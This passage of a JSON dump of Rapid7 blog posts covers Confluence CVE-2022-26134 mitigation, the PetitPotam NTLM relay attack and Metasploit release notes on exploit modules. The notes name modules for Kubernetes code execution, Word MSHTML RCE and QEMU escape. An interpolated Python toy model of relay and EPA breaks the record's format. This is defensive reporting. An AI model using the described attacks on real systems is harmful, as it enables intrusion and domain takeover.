Writing any type of detection logic that relies on **just** the ASCII form will be quickly bypassed.\n\n## Mitigation guidance\n\nAtlassian released patches for CVE-2022-26134 on June 3, 2022. A full list of fixed versions is available in the [advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). A temporary workaround for CVE-2022-26134 is also available\u2014note that the workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\nOrganizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately. We recommend that all organizations consider implementing IP address safelisting rules to restrict access to Confluence.\n\nIf you are unable to apply safelist IP rules to your Confluence server, consider adding WAF protection. Based on the details published so far, we recommend adding Java deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. 
For example, see the `JavaDeserializationRCE_BODY`, `JavaDeserializationRCE_URI`, `JavaDeserializationRCE_QUERYSTRING`, and `JavaDeserializationRCE_HEADER` rules described [here](<https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs>).\n\n## Rapid7 customers\n\n**InsightVM and Nexpose:** Customers can assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks as of June 3, 2022:\n\n * A remote check (atlassian-confluence-cve-2022-26134-remote) available in the 3:30 PM EDT content-only release on June 3\n * A remote _version_ check (atlassian-confluence-cve-2022-26134) available in the 9 PM EDT content-only release on June 3\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR's built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Confluence Java App Launching Processes\n\nThe Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n**tCell:** Customers leveraging the Java App Server Agent can protect themselves from exploitation by using the OS Commands block capability. For customers leveraging a Web Server Agent, we recommend creating a block rule for any url path starting with `${` or `%24%7B`.\n\n## Updates\n\n**June 3, 2022 11:20 AM EDT:** This blog has been updated to reflect that all supported versions of Confluence Server and Confluence Data Center are affected, and it's likely that **all versions** (including LTS and unsupported) are affected, but Atlassian has not yet determined the earliest vulnerable version.\n\n**June 3, 2022 11:45 AM EDT:** Atlassian has released a temporary workaround for CVE-2022-26134. The workaround must be manually applied. 
Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\n**June 3, 2022 1:15 PM EDT:** Atlassian has released patches for CVE-2022-26134. A full list of fixed versions is [available in their advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). Rapid7 recommends applying patches OR the temporary workaround (manual) on an **emergency basis.**\n\n**June 3, 2022 3:15 PM EDT:** A full technical analysis of CVE-2022-26134 has been added to this blog to aid security practitioners in understanding and prioritizing this vulnerability. A vulnerability check for InsightVM and Nexpose customers is in active development with a release targeted for this afternoon.\n\n**June 3, 2022 3:30 PM EDT:** InsightVM and Nexpose customers can assess their exposure to CVE-2022-26134 with a remote vulnerability check in today's (June 3, 2022) content release.\n\n**June 6, 2022 10 AM EDT:** A second content release went out the evening of Friday, June 3 containing a remote version check for CVE-2022-26134. This means InsightVM and Nexpose customers are able to assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks.\n\nAttacker activity targeting on-premise instances of Confluence Server and Confluence Data Center has continued to increase. 
Organizations that have not yet applied the patch or the workaround should **assume compromise** and activate incident response protocols in addition to remediating CVE-2022-26134 on an emergency basis.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T23:27:15", "type": "rapid7blog", "title": "Active Exploitation of Confluence CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-06-02T23:27:15", "id": "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "href": "https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T19:20:09", "description": "\n\n \n_The PetitPotam attack vector was assigned CVE-2021-36942 and patched on August 10, 2021. 
See the `Updates` section at the end of this post for more information._\n\nLate last month (July 2021), security researcher [Topotam](<https://github.com/topotam>) published a [proof-of-concept (PoC) implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, **unauthenticated** attacker to completely take over a Windows domain with the Active Directory Certificate Services (AD CS) role running \u2014 including domain controllers. Rapid7 researchers have tested public proof-of-concept code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: \"This attack is too easy.\" \n\nPetitPotam works by abusing Microsoft\u2019s Encrypting File System Remote Protocol (MS-EFSRPC) to trick one Windows host into authenticating to another over LSARPC on TCP port 445. Successful exploitation means that the target server will perform NTLM authentication to an attacker-chosen server, allowing an attacker who relays that authentication to do... pretty much anything they want with a Windows domain (e.g., deploy ransomware, create nefarious new group policies, and so on). The folks over at SANS ISC have a great write-up [here](<https://isc.sans.edu/diary/Active+Directory+Certificate+Services+%28ADCS+-+PKI%29+domain+admin+vulnerability/27668>).\n\nAccording to Microsoft\u2019s [ADV210003 advisory](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>), Windows users are potentially vulnerable to this attack if they are using Active Directory Certificate Services (AD CS) with any of the following services:\n\n * Certificate Authority Web Enrollment\n * Certificate Enrollment Web Service\n\nNTLM relay attacks aren\u2019t new\u2014they\u2019ve [been around for decades](<https://owasp.org/www-pdf-archive/NTLM_Relay_Attacks.pdf>). 
However, a few things make PetitPotam and its [variants](<https://github.com/bats3c/ADCSPwn>) of higher interest than your more run-of-the-mill NTLM relay attack. As noted above, remote attackers don\u2019t need credentials to make this thing work, but more importantly, there\u2019s no user interaction required to coerce a target domain controller to authenticate to a threat actor\u2019s server. Not only is this easier to do \u2014 it\u2019s faster (though admittedly, well-known tools like Mimikatz are also extremely effective for gathering domain administrator-level service accounts). PetitPotam is the latest attack vector to underscore the fundamental fragility of the Active Directory privilege model. \n\nMicrosoft released [an advisory](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>) with a series of updates in response to community concern about the attack \u2014 which, as they point out, is \u201ca classic NTLM relay attack\u201d that abuses intended functionality. Users concerned about the PetitPotam attack should review Microsoft\u2019s guidance on mitigating NTLM relay attacks against Active Directory Certificate Services in [KB500413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). Since it looks like Microsoft [will not issue an official fix](<https://twitter.com/msftsecresponse/status/1419025196044865539>) for this vector, community researchers have added PetitPotam to [a running list](<https://github.com/cfalta/MicrosoftWontFixList/blob/main/README.md>) of \u201cwon\u2019t fix\u201d exploitable conditions in Microsoft products.\n\nThe PetitPotam PoC is already popular with red teams and community researchers. We expect that interest to increase as Black Hat brings further scrutiny to [Active Directory Certificate Services attack surface area](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>). 
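The mitigation guidance that follows hinges on one point: a relayed NTLM response verifies unless something ties it to the channel the client actually used, which is what Extended Protection for Authentication (EPA) adds and why EPA needs a TLS channel to bind to. The following is an added toy model, not code from the original post or from Microsoft: it does not reproduce NTLM's wire format, the MS-EFSRPC coercion or any IIS setting, only the decision of whether a relayed response is accepted. Host names, the machine secret and the certificate bytes are constructed.

```python
"""
Added toy model (not code from the original post or from Microsoft) of an NTLM
relay in the PetitPotam style and of why EPA only helps once the relay target
also requires TLS. Real NTLM messages, the MS-EFSRPC coercion and IIS
configuration are not reproduced; only the decision of whether a relayed
response verifies is kept. All names, secrets and certificate bytes are
constructed for the example.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Set

COERCED_ACCOUNT = "DC01$"                            # machine account that gets coerced (placeholder)
MACHINE_SECRET = b"dc01-machine-secret"              # stand-in for the account's NT hash (constructed)
REAL_CA_CERT = b"CA01 web enrollment certificate"    # constructed, not a real certificate
ATTACKER_CERT = b"attacker listener certificate"     # constructed


def channel_binding_token(tls_cert: Optional[bytes]) -> bytes:
    """EPA ties the NTLM exchange to the TLS channel through a hash of the server
    certificate the client actually connected to. With no TLS there is no channel
    to bind to, so the token is empty."""
    return hashlib.sha256(tls_cert).digest() if tls_cert else b""


class NtlmClient:
    """Any host answering an NTLM challenge; in the relay scenarios this is the
    domain controller that PetitPotam coerces over SMB, where no TLS channel exists."""

    def respond(self, challenge: bytes, tls_cert_seen: Optional[bytes]) -> dict:
        cbt = channel_binding_token(tls_cert_seen)
        # As in NTLMv2, the proof covers the challenge and the channel binding, so
        # a relay cannot swap or strip the binding without invalidating the MAC.
        proof = hmac.new(MACHINE_SECRET, challenge + cbt, "sha256").digest()
        return {"account": COERCED_ACCOUNT, "proof": proof, "cbt": cbt}


class RelayTarget:
    """The service the attacker relays to, e.g. AD CS web enrollment on IIS."""

    def __init__(self, tls_cert: Optional[bytes], require_epa: bool) -> None:
        self.tls_cert = tls_cert        # None models a site that does not require SSL
        self.require_epa = require_epa  # models EPA token checking set to Require
        self._pending: Set[bytes] = set()

    def challenge(self) -> bytes:
        nonce = secrets.token_bytes(8)
        self._pending.add(nonce)
        return nonce

    def verify(self, challenge: bytes, response: dict) -> bool:
        if challenge not in self._pending:      # unknown or already consumed challenge
            return False
        self._pending.discard(challenge)
        # With EPA the target insists the binding matches its own channel; without
        # EPA it accepts whatever binding (possibly none) the response carries.
        expected_cbt = channel_binding_token(self.tls_cert) if self.require_epa else response["cbt"]
        expected = hmac.new(MACHINE_SECRET, challenge + expected_cbt, "sha256").digest()
        return hmac.compare_digest(expected, response["proof"])


def relay(target: RelayTarget, attacker_tls_cert: Optional[bytes]) -> bool:
    """Attacker in the middle: take the target's challenge, have the coerced host
    answer it on the attacker's listener, forward the answer to the target."""
    challenge = target.challenge()
    response = NtlmClient().respond(challenge, attacker_tls_cert)
    return target.verify(challenge, response)


def direct_logon(target: RelayTarget) -> bool:
    """A legitimate client authenticating straight to the target over its real channel."""
    challenge = target.challenge()
    return target.verify(challenge, NtlmClient().respond(challenge, target.tls_cert))


def run_scenarios() -> Dict[str, bool]:
    """Does a PetitPotam-style relay succeed under each target configuration?"""
    return {
        "http_no_epa": relay(RelayTarget(None, False), None),
        "https_no_epa": relay(RelayTarget(REAL_CA_CERT, False), None),
        "epa_without_require_ssl": relay(RelayTarget(None, True), None),
        "epa_and_require_ssl_smb_coercion": relay(RelayTarget(REAL_CA_CERT, True), None),
        "epa_and_require_ssl_attacker_tls": relay(RelayTarget(REAL_CA_CERT, True), ATTACKER_CERT),
        "epa_and_require_ssl_legit_client": direct_logon(RelayTarget(REAL_CA_CERT, True)),
    }


if __name__ == "__main__":
    for name, relayed in run_scenarios().items():
        print(f"{name:34} {'relay accepted' if relayed else 'rejected'}")
```

PetitPotam's coerced authentication arrives over SMB, with no TLS channel at all, so against an AD CS web enrollment site with EPA and Require SSL it lands in the `epa_and_require_ssl_smb_coercion` row and is rejected. With EPA but no Require SSL, the plain-HTTP listener has nothing to bind to and the relay goes through, which is why KB5005413 insists on the Require SSL step. The model says nothing about disabling NTLM or SMB signing, which remove the relay surface rather than bind it.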
\n\n## Mitigation Guidance\n\nA patch that mitigates this attack chain is available as of August 10, 2021. Windows administrators should apply the August 10, 2021 patch for CVE-2021-36942 as soon as possible, prioritizing domain controllers, and then follow the guidance below as specified in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>).\n\nIn general, to prevent NTLM relay attacks on networks with NTLM enabled, domain administrators should ensure that services that permit NTLM authentication make use of protections such as [Extended Protection for Authentication](<https://docs.microsoft.com/en-us/security-updates/securityadvisories/2009/973811>) (EPA) coupled with \u201c[Require SSL](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>)\u201d for affected virtual sites, or signing features such as SMB signing. Implementing \u201cRequire SSL\u201d is a critical step: Without it, EPA is ineffective.\n\nAs an NTLM relay attack, PetitPotam takes advantage of servers on which Active Directory Certificate Services (AD CS) is not configured with the protections mentioned above. Microsoft\u2019s [KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)](<https://support.microsoft.com/help/5005413>) emphasizes that the primary mitigation for PetitPotam consists of three configuration changes (and an IIS restart). In addition to primary mitigations, Microsoft also recommends disabling NTLM authentication where possible, starting with domain controllers. \n\nIn this order, [KB5005413](<https://support.microsoft.com/help/5005413>) recommends:\n\n * Disabling NTLM Authentication on Windows domain controllers. 
Documentation on doing this can be found [here](<https://docs.microsoft.com/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-ntlm-authentication-in-this-domain>).\n * Disabling NTLM on any AD CS Servers in your domain using the group policy [Network security: Restrict NTLM: Incoming NTLM traffic](<https://docs.microsoft.com/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-incoming-ntlm-traffic>). For step-by-step directions, see [KB5005413](<https://support.microsoft.com/help/5005413>).\n * Disabling NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the \"Certificate Authority Web Enrollment\" or \"Certificate Enrollment Web Service\" services.\n\nWhile not included in Microsoft\u2019s official guidance, community researchers [have tested](<https://twitter.com/gentilkiwi/status/1421949715986403329>) using NETSH RPC filtering to block PetitPotam attacks [with apparent success](<https://twitter.com/CraigKirby/status/1422569782088388611>). Rapid7 research teams have not verified this behavior, but it may be [an option](<https://www.bleepingcomputer.com/news/microsoft/windows-petitpotam-attacks-can-be-blocked-using-new-method/>) for blocking the attack vector without negatively impacting local EFS functionality.\n\n## Rapid7 Customers\n\nInsightVM and Nexpose customers can assess their exposure to PetitPotam via the local vulnerability checks `msft-adv210003`, which looks for the registry settings described in [ADV210003](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>), and `msft-cve-2021-36942`, which checks for the patches released by Microsoft on August 10.\n\n## Updates\n\n**August 10, 2021:** Microsoft has released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. 
Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated. ", "cvss3": {}, "published": "2021-08-03T20:13:50", "type": "rapid7blog", "title": "PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36942"], "modified": "2021-08-03T20:13:50", "id": "RAPID7BLOG:D9E3C0B84D67BD0A26DEAD5F6F4EAAC4", "href": "https://blog.rapid7.com/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-22T15:05:39", "description": "## We just couldn't contain ourselves!\n\n\n\nThis week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! 
Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.\n\n## Atlassian Confluence WebWork OGNL Injection gets Windows support\n\nYou might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7\u2019s own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.\n\n## New module content (2)\n\n * [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.\n * [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. 
The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.\n\n## Enhancements and features\n\n * [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) \\- Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.\n * [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. 
The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.\n\n## Bugs fixed\n\n * [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)\n * [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-10-22T14:25:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T14:25:55", "id": "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "href": "https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-10T23:03:49", "description": "## Word and Javascript are a rare duo.\n\n\n\nThanks to [thesunRider](<https://github.com/thesunRider>). 
You too can experience the wonder of this mystical duo. The sole new Metasploit module this release adds a file format attack to generate a very special document. By utilizing JavaScript embedded in a Word document to trigger a chain of events that slip through various Windows facilities, a session as the user who opened the document can be yours.\n\n## Do you like spiders?\n\nIt has been three years since SMB2 support was added to SMB share enumeration and over a year since SMB3 support was added, yet the spiders are not done spinning their webs. Thanks to [sjanusz-r7](<https://github.com/sjanusz-r7>), the spiders have evolved to take advantage of these new skills and the webs can span new doorways. Updates to `scanner/smb/smb_enumshares` improve enumeration support for the latest Windows targets that deploy with SMB3 only by default.\n\n## New module content (1)\n\n * [Microsoft Office Word Malicious MSHTML RCE](<https://github.com/rapid7/metasploit-framework/pull/15742>) by [klezVirus](<https://github.com/klezVirus>), [lockedbyte](<https://github.com/lockedbyte>), [mekhalleh (RAMELLA S\u00e9bastien)](<https://github.com/mekhalleh>), and [thesunRider](<https://github.com/thesunRider>), which exploits [CVE-2021-40444](<https://attackerkb.com/topics/6ojqzQoPox/cve-2021-40444?referrer=blog>) \\- This adds an exploit for CVE-2021-40444, a vulnerability that affects Microsoft Word. 
Successful exploitation results in code execution in the context of the user running Microsoft Word.\n\n## Enhancements and features\n\n * [#15854](<https://github.com/rapid7/metasploit-framework/pull/15854>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This updates the `SpiderProfiles` option as part of the `scanner/smb/smb_enumshares` module to now work against newer SMB3 targets, such as Windows 10, Windows Server 2016, and above.\n * [#15888](<https://github.com/rapid7/metasploit-framework/pull/15888>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This adds anonymised database statistics to msfconsole's `debug` command, which is used to help developers track down database issues as part of user-generated error reports.\n * [#15929](<https://github.com/rapid7/metasploit-framework/pull/15929>) from [bcoles](<https://github.com/bcoles>) \\- This adds nine new Windows 2003 SP2 targets that the `exploit/windows/smb/ms08_067_netapi` module can exploit.\n\n## Bugs fixed\n\n * [#15808](<https://github.com/rapid7/metasploit-framework/pull/15808>) from [timwr](<https://github.com/timwr>) \\- This fixes a compatibility issue with PowerShell `read_file` on Windows Server 2012 by using the old-style PowerShell syntax (New-Object).\n * [#15937](<https://github.com/rapid7/metasploit-framework/pull/15937>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This removes usage of `SortedSet` to improve support for Ruby 3.\n * [#15939](<https://github.com/rapid7/metasploit-framework/pull/15939>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a bug where the Meterpreter dir/ls function would show the creation date instead of the modified date for the directory contents.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 
6.1.17...6.1.19](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-12-02T11%3A01%3A28-06%3A00..2021-12-09T08%3A35%3A23%2B00%3A00%22>)\n * [Full diff 6.1.17...6.1.19](<https://github.com/rapid7/metasploit-framework/compare/6.1.17...6.1.19>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-10T21:36:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-10T21:36:13", "id": "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "href": "https://blog.rapid7.com/2021/12/10/metasploit-wrap-up-142/", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-11T21:27:50", "description": "## Welcome, Little Hippo: PetitPotam\n\n\n\nOur very own [@zeroSteiner](<https://github.com/zeroSteiner>) [ported](<https://github.com/rapid7/metasploit-framework/pull/16136>) the [PetitPotam](<https://github.com/topotam/PetitPotam>) exploit to Metasploit this week. This module leverages [CVE-2021-36942](<https://attackerkb.com/topics/TEBmUAfeCs/cve-2021-36942?referrer=blog>), a vulnerability in the Windows Encrypting File System (EFS) API, to capture machine account NTLM challenge-responses. This uses the `EfsRpcOpenFileRaw` function of Microsoft\u2019s Encrypting File System Remote Protocol API ([MS-EFSRPC](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31>)) to coerce machine authentication to a user-controlled listener host. Metasploit's [SMB capture server](<https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/capture/smb.rb>) module can be used for this. The captured authentication is typically used as part of an NTLM relaying attack to take over other Windows hosts. Note that Microsoft has published [guidance](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) on how to mitigate NTLM relay attacks.\n\n## QEMU Human Monitor Interface RCE\n\nContributor [@bcoles](<https://github.com/bcoles>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/16151>) that abuses QEMU's Human Monitor Interface (HMP) TCP server to execute arbitrary commands by using the `migrate` HMP command. Furthermore, since the HMP TCP service is reachable from emulated devices, it is possible to escape QEMU from a guest system using this module. 
Note that it doesn't work on Windows hosts since the `migrate` command cannot spawn processes on this platform.\n\n## New module content (2)\n\n * [PetitPotam](<https://github.com/rapid7/metasploit-framework/pull/16136>) by [GILLES Lionel](<https://github.com/topotam>) and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-36942](<https://attackerkb.com/topics/TEBmUAfeCs/cve-2021-36942?referrer=blog>) \\- This adds a new auxiliary scanner module that ports the PetitPotam tool to Metasploit and leverages CVE-2021-36942 to coerce Windows hosts to authenticate to a user-specified host, which enables an attacker to capture NTLM credentials for further actions, such as relay attacks.\n * [QEMU Monitor HMP 'migrate' Command Execution](<https://github.com/rapid7/metasploit-framework/pull/16151>) by [bcoles](<https://github.com/bcoles>) \\- This adds a module that can exploit the QEMU HMP service to execute OS commands. The HMP TCP service is reachable from emulated devices, so it is possible to escape QEMU by exploiting this vulnerability.\n\n## Enhancements and features\n\n * [#16010](<https://github.com/rapid7/metasploit-framework/pull/16010>) from [lap1nou](<https://github.com/lap1nou>) \\- This updates the zabbix_script_exec module with support for Zabbix version 5.0 and later. It also adds a new item-based execution technique and support for delivering Linux native payloads.\n * [#16163](<https://github.com/rapid7/metasploit-framework/pull/16163>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Support has been added for the ClaimsPrincipal .NET deserialization gadget chain, which was found by [jang](<https://github.com/testanull>). 
An exploit that uses this enhancement will arrive shortly.\n * [#16125](<https://github.com/rapid7/metasploit-framework/pull/16125>) from [bcoles](<https://github.com/bcoles>) \\- This module can exploit GXV3140 models now that an `ARCH_CMD` target has been added.\n\n## Bugs fixed\n\n * [#16121](<https://github.com/rapid7/metasploit-framework/pull/16121>) from [timwr](<https://github.com/timwr>) \\- This fixes an exception caused by exploits that call `rhost()` in `Msf::Post::Common` without a valid session.\n * [#16142](<https://github.com/rapid7/metasploit-framework/pull/16142>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue with Meterpreter's `getenv` command that was not returning `NULL` when querying for a non-existing environment variable.\n * [#16143](<https://github.com/rapid7/metasploit-framework/pull/16143>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes an issue where a Cygwin SSH session was not correctly identified as a Windows device due to a case-sensitivity issue.\n * [#16147](<https://github.com/rapid7/metasploit-framework/pull/16147>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a bug where `ssh_enumusers` would only use 